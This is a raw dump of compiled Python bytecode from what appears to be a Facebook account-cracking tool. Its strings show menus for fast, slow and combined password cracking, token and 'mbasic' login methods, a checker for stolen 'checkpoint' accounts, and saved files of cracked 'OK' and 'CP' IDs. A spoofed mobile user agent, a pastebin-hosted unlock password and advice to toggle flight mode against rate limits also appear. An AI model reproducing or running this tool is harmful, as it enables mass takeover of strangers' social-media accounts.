SPAM ACCOUNTSr\x8c\x00\x00\x00z\t [ BACK ])\x15rk\x00\x00\x00rQ\x00\x00\x00rl\x00\x00\x00rm\x00\x00\x00ru\x00\x00\x00r\x85\x00\x00\x00rp\x00\x00\x00rq\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00rt\x00\x00\x00rP\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00rE\x00\x00\x00r0\x00\x00\x00rn\x00\x00\x00r\xc5\x00\x00\x00r\xc6\x00\x00\x00rH\x00\x00\x00rx\x00\x00\x00)\x0er\xca\x00\x00\x00r\x80\x00\x00\x00Z\x02mmZ\x02nnr\x91\x01\x00\x00Z\x02teZ\x03limrf\x01\x00\x00Z\x03idir\x81\x00\x00\x00r\x87\x00\x00\x00Z\x04ada2Z\x04idi2ra\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00r\x9c\x00\x00\x00\x1d\x05\x00\x00sJ\x00\x00\x00\x16\x01\x02\x01\x0e\x01\x12\x01\x0c\x01\x1e\x01\x10\x01\x14\x01\n\x01\x02\xfe\x04\x03\x04\x01\x14\x01\x10\x01\x14\x01\x0c\x01\x0c\x01\x10\x01\x08\x01\x02\x01\x12\x01\x0c\x01\x02\x01\x0c\x01\x10\x01\x04\xff\x0c\x02\x0c\x01\x02\xff\x12\x02\x0c\x01\x0c\x01\x0c\x01\x02\xff\x08\x02\x08\x01\n\x01r\x9c\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\t\x00\x00\x00C\x00\x00\x00s\xf0\x02\x00\x00t\x00\x83\x00\x01\x00t\x01\x83\x00\x01\x00t\x02d\x01t\x03t\x04t\x03f\x03\x16\x00\x83\x01\x01\x00t\x05d\x02\x83\x01\x01\x00t\x05d\x03t\x04t\x06t\x04t\x07f\x04\x16\x00\x83\x01\x01\x00t\x05d\x04t\x04t\x06t\x04t\x03f\x04\x16\x00\x83\x01\x01\x00t\x08d\x05t\x07t\x06t\x07t\x03t\x07f\x05\x16\x00\x83\x01}\x00|\x00d\x06v\x00rEt\x02d\x07t\tt\x06t\tt\x06f\x04\x16\x00\x83\x01\x01\x00t\n\x83\x00\x01\x00\x90\x01n"|\x00d\x08v\x00r\xcezpt\x0b\xa0\x0cd\t\xa1\x01}\x01t\x05\x01\x00t\x05d\nt\x03t\x06t\x03f\x03\x16\x00\x83\x01\x01\x00t\x05\x01\x00|\x01D\x00]\r}\x02t\x05d\x0bt\x07t\x06t\x07t\x03|\x02f\x05\x16\x00\x83\x01\x01\x00q^t\x05\x01\x00t\x08d\x0ct\x07t\x06t\x07t\x03f\x04\x16\x00\x83\x01}\x03t\x05d\x02\x83\x01\x01\x00|\x03d\x02k\x02r\x8dt\x02d\x07t\tt\x06t\tt\x06f\x04\x16\x00\x83\x01\x01\x00t\r\x83\x00\x01\x00t\x0b\xa0\x0ed\r|\x03\x16\x00\xa1\x01\x01\x00t\x0fd\x0e|\x03\x16\x00\x83\x01\xa0\x10\xa1\x00\xa0\x11\xa1\x00}\x04d\x0f|\x03\x16\x00\xa0\x12d\x10d\x11\xa1\x02\xa0\x12d\x12d\x02\xa1\x02}\x05t\x05d\x13t\x07t\x06t\x07t\x03|\x05t\x13|\x04\x83\x01f\x06\x16\x00\x83\x01\x01\x00W\x00n\xad\x04\x00t\x14t\x15f\x02y\xcd\x01\x00\x01\x00\x01\x00t\x05d\x14t\tt\x06t\tf\x03\x16\x00\x83\x01\x01\x00Y\x00n\x9aw\x00|\x00d\x15v\x00\x90\x01rZzqt\x0b\xa0\x0cd\x16\xa1\x01}\x06t\x05\x01\x00t\x05d\x17t\x03t\x06t\x03f\x03\x16\x00\x83\x01\x01\x00t\x05\x01\x00|\x06D\x00]\r}\x02t\x05d\x0bt\x07t\x06t\x07t\x03|\x02f\x05\x16\x00\x83\x01\x01\x00q\xe8t\x05\x01\x00t\x08d\x0ct\x07t\x06t\x07t\x03f\x04\x16\x00\x83\x01}\x03t\x05d\x02\x83\x01\x01\x00|\x03d\x02k\x02\x90\x01r\x18t\x02d\x07t\tt\x06t\tt\x06f\x04\x16\x00\x83\x01\x01\x00t\r\x83\x00\x01\x00t\x0b\xa0\x0ed\x18|\x03\x16\x00\xa1\x01\x01\x00t\x0fd\x19|\x03\x16\x00\x83\x01\xa0\x10\xa1\x00\xa0\x11\xa1\x00}\x04d\x0f|\x03\x16\x00\xa0\x12d\x10d\x11\xa1\x02\xa0\x12d\x12d\x02\xa1\x02}\x05t\x05d\x1at\x07t\x06t\x07t\x03|\x05t\x13|\x04\x83\x01f\x06\x16\x00\x83\x01\x01\x00W\x00n"\x04\x00t\x14t\x15f\x02\x90\x01yY\x01\x00\x01\x00\x01\x00t\x05d\x14t\tt\x06t\tf\x03\x16\x00\x83\x01\x01\x00Y\x00n\x0ew\x00t\x02d\x07t\tt\x06t\tt\x06f\x04\x16\x00\x83\x01\x01\x00t\n\x83\x00\x01\x00t\x05\x01\x00t\x08d\x1bt\x07t\x06t\x07t\x03f\x04\x16\x00\x83\x01\x01\x00t\n\x83\x00\x01\x00d\x00S\x00)\x1cNz\x18%s [ %sCRACK RESULTS %s]r%\x00\x00\x00z\x1d%s [%s1%s] %sCHECK OK RESULTSz\x1d%s [%s2%s] %sCHECK CP RESULTSrT\x00\x00\x00rU\x00\x00\x00rV\x00\x00\x00rW\x00\x00\x00\xda\x02OKz)%s [%s CRACK RESULTS STORED IN FILE OK%s]u\x11\x00\x00\x00%s [%s\xe2\x80\xa2%s] %s%su!\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sENTER FILE NAME : 
z\tcat OK/%sz\x05OK/%sz\x02%sr\x9e\x01\x00\x00r\x8c\x00\x00\x00z\x04.txtu6\x00\x00\x00\n%s [%s\xe2\x80\xa2%s] %sTOTAL CRACK ACCOUNT %s RESULT %s DATEz\x1b%s [%s NO RESULTS FOUND %s]r_\x00\x00\x00\xda\x02CPz+%s [%s CRACK RESULTS STORED IN CP FILES %s]z\tcat CP/%sz\x05CP/%su5\x00\x00\x00\n%s [%s\xe2\x80\xa2%s] %sTOTAL CRACK ACCOUNT %s RESULT %s DATEr\xa6\x00\x00\x00)\x16rH\x00\x00\x00rR\x00\x00\x00rE\x00\x00\x00rm\x00\x00\x00r(\x00\x00\x00rP\x00\x00\x00rl\x00\x00\x00rQ\x00\x00\x00rk\x00\x00\x00r0\x00\x00\x00rx\x00\x00\x00rM\x00\x00\x00\xda\x07listdirr\x9d\x00\x00\x00rN\x00\x00\x00ru\x00\x00\x00r\x85\x00\x00\x00rh\x01\x00\x00r\xc4\x00\x00\x00r\xc6\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00)\x07Z\x02chZ\x03okl\xda\x04filerw\x01\x00\x00Z\x03pppZ\x04del1Z\x03cplrC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00r\x9d\x00\x00\x00A\x05\x00\x00sr\x00\x00\x00\x06\x01\x06\x01\x12\x01\x08\x01\x14\x01\x14\x01\x16\x01\x08\x01\x14\x01\n\x01\x08\x01\x02\x01\n\x01\x04\x01\x12\x01\x04\x01\x08\x01\x18\x01\x04\x01\x14\x01\x08\x01\x08\x01\x14\x01\x06\x01\x0e\x01\x14\x01\x18\x01 \x01\x10\x01\x16\x01\x02\xff\n\x02\x02\x01\n\x01\x04\x01\x12\x01\x04\x01\x08\x01\x18\x01\x04\x01\x14\x01\x08\x01\n\x01\x14\x01\x06\x01\x0e\x01\x14\x01\x18\x01 \x01\x12\x01\x16\x01\x02\xff\x14\x03\x06\x01\x04\x01\x14\x01\n\x01r\x9d\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x12\x00\x00\x00C\x00\x00\x00s\x9e\x02\x00\x00d\x01}\x02t\x00\xa0\x01\xa1\x00}\x03|\x03j\x02\xa0\x03d\x02d\x03d\x04t\x04d\x05|\x02d\x06d\x07d\x08d\td\nd\x0bt\x04d\x0c\x17\x00d\rd\x0ed\x0f\x9c\x0f\xa1\x01\x01\x00i\x00}\x04t\x05|\x03j\x06t\x04d\x0c\x17\x00d\x10|\x02i\x01d\x11\x8d\x02j\x07d\x12\x83\x02}\x05|\x05\xa0\x08d\x13d\x14d\x15i\x01\xa1\x02}\x06g\x00d\x16\xa2\x01}\x07|\x06\xa0\td\x17\xa1\x01D\x00]\x17}\x08|\x08\xa0\x06d\x18\xa1\x01|\x07v\x00rW|\x04\xa0\x03|\x08\xa0\x06d\x18\xa1\x01|\x08\xa0\x06d\x19\xa1\x01i\x01\xa1\x01\x01\x00q@q@|\x04\xa0\x03|\x00|\x01d\x1a\x9c\x02\xa1\x01\x01\x00z\x13t\x05|\x03j\nt\x04|\x06\xa0\x06d\x1b\xa1\x01\x17\x00|\x04d\x1cd\x1d\x8d\x03j\x07d\x12\x83\x02}\tW\x00n\x15\x04\x00t\x00j\x0bj\x0cy\x88\x01\x00\x01\x00\x01\x00t\rd\x1et\x0et\x0ft\x0et\x0ff\x04\x16\x00\x83\x01\x01\x00Y\x00n\x01w\x00d\x1f|\x03j\x10v\x00r\x9at\rd t\x11t\x0ft\x11t\x0ff\x04\x16\x00\x83\x01\x01\x00d\x00S\x00d!|\x03j\x10v\x00\x90\x01r#|\t\xa0\x08d\x13\xa1\x01}\n|\n\xa0\x08d\x17d\x18d"i\x01\xa1\x02d\x19\x19\x00}\x0b|\n\xa0\x08d\x17d\x18d#i\x01\xa1\x02d\x19\x19\x00}\x0c|\n\xa0\x08d\x17d\x18d$i\x01\xa1\x02d\x19\x19\x00}\r|\x0b|\x0b|\x0c|\x0cd%d&|\rd\'\x9c\x07}\x0et\x05|\x03j\nt\x04|\nd\x1b\x19\x00\x17\x00|\x0ed(\x8d\x02j\x07d\x12\x83\x02}\x0fd)d*\x84\x00|\x0f\xa0\td+\xa1\x01D\x00\x83\x01}\x10t\x12t\x13|\x10\x83\x01\x83\x01d,k\x02r\xf9t\rd-t\x11t\x0ft\x11t\x0ff\x04\x16\x00\x83\x01\x01\x00n\x0ft\rd.t\x11t\x0ft\x11t\x14t\x12t\x13|\x10\x83\x01\x83\x01f\x05\x16\x00\x83\x01\x01\x00t\x15t\x13|\x10\x83\x01\x83\x01D\x00]\x12}\x11t\rd/t\x12|\x11d0\x17\x00\x83\x01d1\x17\x00|\x10|\x11\x19\x00\x17\x00\x83\x02\x01\x00\x90\x01q\x0ed\x00S\x00d2t\x12|\t\x83\x01v\x00\x90\x01rC|\t\xa0\x08d3d4d2i\x01\xa1\x02\xa0\x08d3\xa1\x01j\x07}\x12t\rd5t\x0et\x0ft\x0et\x0f|\x12f\x05\x16\x00\x83\x01\x01\x00d\x00S\x00t\rd6t\x0et\x0ft\x0et\x0ff\x04\x16\x00\x83\x01\x01\x00d\x00S\x00)7Nz\xa1Mozilla/5.0 (Linux; Android 11; vivo 1904 Build/RP1A.200720.012; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile 
Safari/537.36r\xfc\x00\x00\x00r\xfd\x00\x00\x00r-\x00\x00\x00r\xe4\x00\x00\x00r!\x01\x00\x00r"\x01\x00\x00r#\x01\x00\x00r$\x01\x00\x00r%\x01\x00\x00r&\x01\x00\x00r\'\x01\x00\x00r\xff\x00\x00\x00r\x00\x01\x00\x00r(\x01\x00\x00r\xe5\x00\x00\x00r\x8a\x00\x00\x00r\x08\x01\x00\x00r*\x01\x00\x00r+\x01\x00\x00r\x86\x00\x00\x00r,\x01\x00\x00rk\x00\x00\x00r[\x00\x00\x00r\n\x01\x00\x00r.\x01\x00\x00r/\x01\x00\x00Tr0\x01\x00\x00u!\x00\x00\x00%s [%s!%s] %sSPAM ACCOUNTS \xe2\x9a\xa0\xef\xb8\x8fr\x0f\x01\x00\x00u#\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sNO CHECKPOINT \xe2\x9c\x94\xef\xb8\x8fr\x12\x01\x00\x00r\x0c\x01\x00\x00r-\x01\x00\x00r1\x01\x00\x00r%\x00\x00\x00r2\x01\x00\x00r3\x01\x00\x00r\x0e\x01\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00S\x00\x00\x00r4\x01\x00\x00rC\x00\x00\x00r5\x01\x00\x00r6\x01\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00r8\x01\x00\x00\xaf\x05\x00\x00r9\x01\x00\x00z\x1dlog_hasil.<locals>.<listcomp>r:\x01\x00\x00rg\x00\x00\x00u\x1e\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sONE TAP ACCOUNTu"\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sTHERE IS %s OPTION z\x03 r!\x00\x00\x00r;\x01\x00\x00r<\x01\x00\x00Z\x03divr\x87\x00\x00\x00z\x0f%s [%s!%s] %s%sz$%s [%s!%s] %sPASSWORD HAS CHANGED :()\x16rp\x00\x00\x00r\xf1\x00\x00\x00r\x8b\x00\x00\x00r\x14\x01\x00\x00\xda\x04hostr=\x01\x00\x00rq\x00\x00\x00rt\x00\x00\x00r>\x01\x00\x00r?\x01\x00\x00r\x86\x00\x00\x00r{\x00\x00\x00r@\x01\x00\x00rP\x00\x00\x00r0\x00\x00\x00rl\x00\x00\x00r\x11\x01\x00\x00rQ\x00\x00\x00r\xf2\x00\x00\x00r\xc6\x00\x00\x00rm\x00\x00\x00rA\x01\x00\x00)\x13rB\x01\x00\x00rC\x01\x00\x00r\xa4\x00\x00\x00rE\x01\x00\x00r\xbf\x00\x00\x00rF\x01\x00\x00rG\x01\x00\x00r\x19\x01\x00\x00r\xa1\x00\x00\x00rH\x01\x00\x00r*\x01\x00\x00rI\x01\x00\x00rJ\x01\x00\x00r1\x01\x00\x00rK\x01\x00\x00rL\x01\x00\x00rM\x01\x00\x00rN\x01\x00\x00Z\x02ohrC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00\xda\tlog_hasil|\x05\x00\x00sx\x00\x00\x00\x04\x01\x08\x01\x06\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x06\x01\x02\x01\x02\x01\x08\xf1\x04\x11\x1e\x01\x10\x01\x08\x01\x0e\x01\x0e\x01\x1c\x01\x02\x02\x10\x01\x02\x01&\x01\x10\x01\x18\x01\x02\xff\n\x02\x18\x01\x0c\x01\n\x01\x14\x01\x14\x01\x14\x01\x02\x02\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x06\xf9\x1e\t\x14\x01\x10\x01\x16\x01\x1e\x02\x10\x01"\x01\x04\xff\x0e\x02\x18\x01\x1a\x01\x18\x02r\xa9\x01\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00sd\x01\x00\x00t\x00d\x01t\x01t\x02t\x01f\x03\x16\x00\x83\x01\x01\x00t\x03d\x02\x83\x01\x01\x00t\x03d\x03t\x04t\x05t\x04t\x01t\x06f\x05\x16\x00\x83\x01\x01\x00t\x07d\x04t\x04t\x05t\x04t\x01t\x04f\x05\x16\x00\x83\x01}\x00z\tt\x08|\x00d\x05\x83\x02\xa0\t\xa1\x00}\x01W\x00n\x1b\x04\x00t\nyG\x01\x00\x01\x00\x01\x00t\x03d\x06t\x0bt\x05t\x0bt\x05f\x04\x16\x00\x83\x01\x01\x00t\x0c\xa0\rd\x07\xa1\x01\x01\x00t\x0e\x83\x00\x01\x00Y\x00n\x01w\x00t\x03d\x08t\x04t\x05t\x04t\x01t\x04t\x0ft\x10|\x01\x83\x01\x83\x01f\x06\x16\x00\x83\x01\x01\x00t\x03d\x02\x83\x01\x01\x00|\x01D\x00]4}\x02|\x02\xa0\x11d\td\x02\xa1\x02}\x03|\x03\xa0\x12d\n\xa1\x01}\x04t\x03d\x0bt\x04t\x05t\x04t\x02t\x01|\x03f\x06\x16\x00\x83\x01\x01\x00z\x0bt\x13|\x04d\x0c\x19\x00|\x04d\r\x19\x00\x83\x02\x01\x00W\x00n\x0b\x04\x00t\x14j\x15j\x16y\x8d\x01\x00\x01\x00\x01\x00Y\x00q^w\x00t\x03d\x02\x83\x01\x01\x00q^t\x03d\x02\x83\x01\x01\x00t\x03d\x0et\x04t\x05t\x04t\x01f\x04\x16\x00\x83\x01\x01\x00t\x03\x01\x00t\x07d\x0ft\x04t\x05t\x04t\x01f\x04\x16\x00\x83\x01\x01\x00t\x17\x83\x00\x01
\x00d\x00S\x00)\x10Nz)%s [ %sCHECKPOINT ACCOUNTS AUTO CHECK %s]r%\x00\x00\x00u&\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sEXAMPLE FILE: CP/%s.txtu\x18\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sFILE : %sr\x84\x00\x00\x00z\x1e%s [%s!%s] %sFILE NOT EXISTINGr"\x00\x00\x00u$\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sTOTAL ACCOUNTS : %s%sr8\x00\x00\x00r\xc0\x00\x00\x00u!\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sCHECK LOGIN : %s%sr\x03\x00\x00\x00r!\x00\x00\x00u(\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sCHECKING PROCESS COMPLETEr\xa6\x00\x00\x00)\x18rE\x00\x00\x00rm\x00\x00\x00r(\x00\x00\x00rP\x00\x00\x00rQ\x00\x00\x00rl\x00\x00\x00r\x8d\x01\x00\x00rk\x00\x00\x00ru\x00\x00\x00\xda\treadlines\xda\x11FileNotFoundErrorr0\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r\x9e\x00\x00\x00r\xf2\x00\x00\x00r\xc6\x00\x00\x00r\xc4\x00\x00\x00r\xd6\x00\x00\x00r\xa9\x01\x00\x00rp\x00\x00\x00r{\x00\x00\x00r|\x00\x00\x00rx\x00\x00\x00)\x05rw\x01\x00\x00Z\tbuka_bajuZ\x05memekZ\x06kontolZ\x05titidrC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00r\x9e\x00\x00\x00\xbb\x05\x00\x00s6\x00\x00\x00\x12\x01\x08\x01\x16\x01\x16\x01\x02\x01\x12\x01\x0c\x01\x14\x01\x14\x01\x02\xfe \x03\x08\x01\x08\x01\x0c\x01\n\x01\x18\x01\x02\x01\x16\x01\x10\x01\x04\x01\x02\xff\n\x02\x08\x01\x14\x01\x04\x01\x14\x01\n\x01r\x9e\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00sh\x00\x00\x00t\x00d\x01\x83\x01\x01\x00t\x00d\x02\x83\x01\x01\x00t\x00d\x03t\x01t\x02t\x01t\x03f\x04\x16\x00\x83\x01\x01\x00t\x00d\x04t\x01t\x02t\x01t\x04f\x04\x16\x00\x83\x01\x01\x00t\x00d\x05t\x01t\x02t\x01t\x05t\x03t\x06f\x06\x16\x00\x83\x01\x01\x00t\x00d\x06t\x01t\x02t\x01t\x04f\x04\x16\x00\x83\x01\x01\x00d\x00S\x00)\x07Nz\x18 [ CHOOSE LOGIN METHOD ]r%\x00\x00\x00z\x1d%s [%s1%s] %sLOGIN WITH TOKENz\x1d%s [%s2%s] %sHOW TO GET TOKENu,\x00\x00\x00%s [%sJ%s] %sJOIN MR. 
ERROR GROUP %s\xe2\x9c\x98%s\xe2\x9c\x98z\x11%s [%s0%s] %sEXIT)\x07rP\x00\x00\x00r(\x00\x00\x00rl\x00\x00\x00rQ\x00\x00\x00rm\x00\x00\x00r*\x00\x00\x00r0\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rj\x00\x00\x00\xd6\x05\x00\x00s\x0c\x00\x00\x00\x08\x01\x08\x01\x14\x01\x14\x01\x18\x01\x18\x01rj\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x84\x00\x00\x00t\x00d\x01\x83\x01\x01\x00t\x00d\x02t\x01t\x02t\x01t\x03f\x04\x16\x00\x83\x01\x01\x00t\x00d\x03t\x01t\x02t\x01t\x04f\x04\x16\x00\x83\x01\x01\x00t\x00d\x04t\x01t\x02t\x01t\x01f\x04\x16\x00\x83\x01\x01\x00t\x00d\x05t\x01t\x02t\x01t\x05f\x04\x16\x00\x83\x01\x01\x00t\x00d\x06t\x01t\x02t\x01t\x06f\x04\x16\x00\x83\x01\x01\x00t\x00d\x07t\x01t\x02t\x01t\x05f\x04\x16\x00\x83\x01\x01\x00d\x00S\x00)\x08Nr%\x00\x00\x00z %s [%s1%s] %sAZIM VAU USER AGENTz\'%s [%s2%s] %sCHANGE USER AGENT (MANUAL)z*%s [%s3%s] %sCHANGE USER AGENT (ADJUST HP)z\x1e%s [%s4%s] %sDELETE USER AGENTz\x1d%s [%s5%s] %sCHECK USER AGENTz\x11%s [%s0%s] %sBACK)\x07rP\x00\x00\x00r(\x00\x00\x00rl\x00\x00\x00rQ\x00\x00\x00rm\x00\x00\x00r0\x00\x00\x00r*\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00r\xa8\x00\x00\x00\xde\x05\x00\x00s\x0e\x00\x00\x00\x08\x01\x14\x01\x14\x01\x14\x01\x14\x01\x14\x01\x18\x01r\xa8\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sP\x00\x00\x00t\x00d\x01\x83\x01\x01\x00t\x00d\x02t\x01t\x02t\x01t\x03f\x04\x16\x00\x83\x01\x01\x00t\x00d\x03t\x01t\x02t\x01t\x01f\x04\x16\x00\x83\x01\x01\x00t\x00d\x04t\x01t\x02t\x01t\x04f\x04\x16\x00\x83\x01\x01\x00t\x00d\x01\x83\x01\x01\x00d\x00S\x00)\x05Nr%\x00\x00\x00z\x17%s [%s1%s] %sAPI METHODz\x1a%s [%s2%s] %sMBASIC METHODz\x1c%s [%s3%s] %sFREE FB METHOD )\x05rP\x00\x00\x00rQ\x00\x00\x00rl\x00\x00\x00r(\x00\x00\x00r*\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rl\x01\x00\x00\xe6\x05\x00\x00s\n\x00\x00\x00\x08\x01\x14\x01\x14\x01\x14\x01\x0c\x01rl\x01\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00C\x00\x00\x00sv\x00\x00\x00t\x00d\x01\x83\x01\x01\x00t\x00d\x02t\x01t\x02t\x01t\x03t\x03t\x04t\x03f\x07\x16\x00\x83\x01\x01\x00t\x00d\x03t\x01t\x02t\x01t\x03t\x03t\x01t\x03f\x07\x16\x00\x83\x01\x01\x00t\x00d\x04t\x01t\x02t\x01t\x03t\x03t\x05t\x03f\x07\x16\x00\x83\x01\x01\x00t\x00d\x05t\x01t\x02t\x01t\x03f\x04\x16\x00\x83\x01\x01\x00t\x00d\x01\x83\x01\x01\x00d\x00S\x00)\x06Nr%\x00\x00\x00z+%s [%s1%s] %sFAST CRACK %s[%sFEW RESULTS%s]z+%s [%s2%s] %sSLOW CRACK %s[%sRECOMMENDED%s]z1%s [%s3%s] %sVERY SLOW CRACK %s[%sMORE RESULTS%s]z$%s [%s4%s] %sCOMBINED PASSWORD CRACK)\x06rP\x00\x00\x00rQ\x00\x00\x00rl\x00\x00\x00rm\x00\x00\x00r0\x00\x00\x00r(\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rk\x01\x00\x00\xec\x05\x00\x00s\x0c\x00\x00\x00\x08\x01\x1a\x01\x1a\x01\x1a\x01\x14\x01\x0c\x01rk\x01\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00C\x00\x00\x00s\x9c\x00\x00\x00t\x00d\x01\x83\x01\x01\x00t\x00d\x02t\x01t\x02t\x03t\x04t\x05t\x06t\x07t\x01t\x02t\x03t\x04t\x05t\x06t\x07t\x01t\x02t\x03t\x04f\x12\x16\x00\x83\x01\x01\x00t\x00d\x03t\x01t\x08t\x01t\x01f\x04\x16\x00\x83\x01\x01\x00t\x00d\x04t\x01t\x08t\x01t\x06t\x01t\x06t\x01t\tf\x08\x16\x00\x83\x01\x01\x00t\x00d\x05t\x01t\x08t\x01t\x06t\x02t\x06t\x02t\tf\x08\x16\x00\x83\x01\x01\x00t\nd\x06t\x01t\x08t\x01t\x06f\x04\x16\x00\x83\x01\x01\x00d\x00S\x00)\x07Nr%\x00\x00\x00u_\x00\x00\x00 
%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2%s\xe2\x80\xa2u$\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sCRACKS IN PROGRESS...u3\x00\x00\x00%s [%s\xe2\x80\xa2%s] %s[%sOK%s] IDS SAVED IN >> %sOK/%s.txtu3\x00\x00\x00%s [%s\xe2\x80\xa2%s] %s[%sCP%s] IDS SAVED IN >> %sCP/%s.txtu:\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sON FLIGHT MODE FOR [5 SEC] EVERY 5 MINUTES\n)\x0brP\x00\x00\x00rQ\x00\x00\x00r0\x00\x00\x00r(\x00\x00\x00r\x93\x01\x00\x00r\x97\x00\x00\x00rm\x00\x00\x00r*\x00\x00\x00rl\x00\x00\x00r\x8d\x01\x00\x00rO\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rm\x01\x00\x00\xf3\x05\x00\x00s\x0c\x00\x00\x00\x08\x010\x01\x14\x01\x1c\x01\x1c\x01\x18\x01rm\x01\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00s\xba\x00\x00\x00zGt\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x00\xa0\x01d\x02\xa1\x01}\x00|\x00j\x02}\x01t\x03d\x03\x83\x01\x01\x00t\x04\x83\x00\x01\x00t\x03d\x04\x83\x01\x01\x00t\x05d\x05\x83\x01}\x02|\x01|\x02k\x02r7t\x06d\x06t\x07\x16\x00\x83\x01\x01\x00t\x08\xa0\td\x07\xa1\x01\x01\x00t\n\xa0\x0bd\x08\xa1\x01\x01\x00t\x0c\x83\x00\x01\x00W\x00d\x00S\x00t\x06d\tt\r\x16\x00\x83\x01\x01\x00t\n\xa0\x0bd\n\xa1\x01\x01\x00t\x0e\x83\x00\x01\x00W\x00d\x00S\x00\x04\x00t\x0fy\\\x01\x00\x01\x00\x01\x00t\x06d\x0bt\x10\x16\x00\x83\x01\x01\x00t\nj\x11\xa0\x12\xa1\x00\x01\x00Y\x00d\x00S\x00w\x00)\x0cNz(https://www.google.com/search?q=Azim+Vauz!https://pastebin.com/raw/Ne3Yziv7r%\x00\x00\x00u(\x00\x00\x00\x1b[1;93m\t \xe3\x80\x8bKEY PASSWORD\xe3\x80\x8a\x1b[1;90m \nz\x11 u,\x00\x00\x00%s\n\n\t W E L C O M E \x1b[92;1m\xe2\x9c\x98\x1b[91;1m\xe2\x9c\x98g\x00\x00\x00\x00\x00\x00\xe0?rH\x00\x00\x00z\x1b\n\n%s\t WRONG PASSWORD :( \nz/xdg-open https://t.me/joinchat/VkOiLi-26agwMjE1z-%s\t PLEASE CHECK YOUR INTERNET CONNECTION...!)\x13rp\x00\x00\x00rq\x00\x00\x00rt\x00\x00\x00rP\x00\x00\x00rR\x00\x00\x00rk\x00\x00\x00rE\x00\x00\x00rQ\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00rM\x00\x00\x00rN\x00\x00\x00rx\x00\x00\x00r0\x00\x00\x00\xda\x08azimpassrz\x00\x00\x00rm\x00\x00\x00r:\x00\x00\x00r}\x00\x00\x00)\x03Z\x04azimZ\x04luluZ\x04hulurC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00r\xac\x01\x00\x00\xfb\x05\x00\x00s(\x00\x00\x00\x02\x01\n\x01\n\x01\x06\x01\x08\x01\x06\x01\x08\x01\x08\x01\x08\x01\x0c\x01\n\x01\n\x01\x0c\x01\x0c\x02\n\x01\x0c\x01\x0c\x01\x0c\x01\x10\x01\x02\xfer\xac\x01\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s6\x00\x00\x00z\x07t\x00\xa0\x01d\x01\xa1\x01\x01\x00W\x00n\x04\x01\x00\x01\x00\x01\x00Y\x00z\x08t\x00\xa0\x01d\x02\xa1\x01\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00Y\x00d\x00S\x00)\x03Nr\xa5\x01\x00\x00r\xa4\x01\x00\x00)\x02rM\x00\x00\x00\xda\x05mkdirrC\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00\xda\x06folder\x12\x06\x00\x00s\x08\x00\x00\x00\x10\x01\x08\x01